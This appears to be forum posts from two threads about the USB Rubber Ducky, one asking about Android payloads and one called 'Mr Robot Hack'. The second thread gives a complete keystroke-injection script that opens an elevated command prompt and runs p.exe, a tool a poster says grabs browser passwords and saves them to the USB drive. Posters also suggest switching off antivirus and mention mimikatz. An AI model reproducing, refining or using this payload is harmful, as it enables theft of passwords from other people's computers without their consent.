[How do you use the rubber ducky with androids?]

@Zer0Co0l Thanks for that. I'll search for ducky android payloads. Do you have any links on those that you can share?

Sorry, I didn't mean to be rude, apologies. However, the forums are also supposed to have valuable information, so if you guys don't know a way to accomplish something, don't just say, this absolutely cannot be done, that's not how a hacker's mind should work.

The ducky is a keyboard, usually every OS has a way of navigating around the system just by using a keyboard (no need for a mouse or fingers for touching) so I was wondering if there is any good android payloads that do this.

 

[How do you use the rubber ducky with androids?]

https://play.google.com/store/apps/details?id=jackpal.androidterm&hl=en

shell option for android. I was testing it out and it's not the best however. Or maybe I just don't have root access on my android device.

[How do you use the rubber ducky with androids?]

On 12/13/2016 at 11:37 AM, barry99705 said:

It would have to be phone specific.  Most manufacturers have their own spin on the gui, and the ducky only acts as a keyboard, no mouse(touch).  You'll also not be able to open a shell, since most android phones don't have that capability without an additional app already installed.  I'm not even sure if it's possible.

Instead of shutting down opinions right and left, you can just say you don't know or can't think of a way ;) or not say anything at all

[Mr Robot Hack]

15 hours ago, authorityfinger said:

Lol, I was gonna demonstrate this to my friend, but his AV (avast) detected p.exe as a trojan and deleted it :(

Ha yea, it gets caught by Antivirus. You have to disable them before inserting the ducky. Then you're fine.

[How do you use the rubber ducky with androids?]

I wanna be able to do this too. The rubber ducky comes with a USB to android input converter! I haven't been able to properly test if it actually executes as a keyboard like it does when inserted into a computer but this would be awesome if it did. Let's keep this thread active guys!

[Mr Robot Hack]

Sorry forgot to mention that p.exe grabs the browser passwords and you need the twin duck firmware installed to be able to save them onto the USB in this script.

 

[Mr Robot Hack]

Here is a payload that will run the p.exe using command prompt instead of powershell...

I wanted this because not all computers have powershell enabled but they all have command prompt ;)

DELAY 1200
GUI R
DELAY 300
STRING powershell -NoP -NonI -Exec Bypass "Start-Process cmd -Verb runAs"
DELAY 200
ENTER
DELAY 500
ALT y
DELAY 100
LEFTARROW
DELAY 200
DELETE
DELAY 200
STRING mode con lines=1 cols=18
DELAY 80
ENTER
DELAY 80
STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "QUACK"') do @set duck=%d
DELAY 250
ENTER
DELAY 200
STRING %duck%
ENTER
DELAY 150
STRING p.exe /stext pass.txt
DELAY 100
ENTER
DELAY 2000
STRING exit
DELAY 80
ENTER

I'm not 100% sure why I need the LEFTARROW or DELETE commands, I'm thinking of taking them out but I also grabbed portions of this from elsewheres of course and they were there.

Open to suggestions.

[Mr Robot Hack]

On 2016-12-08 at 6:42 PM, Mr.X said:

Your version doesn't bypass the running scripts. I get something like: running scripts is disabled on this machine. Which means it can't execute mimikatz script. Did you fix that yet?

I got the same error for whiterabbit.ps1

[Mr Robot Hack]

Thanks for all this Enzym3.

Question about p.exe or this payload in general. Does it get caught by anti-virus programs since it's an .exe?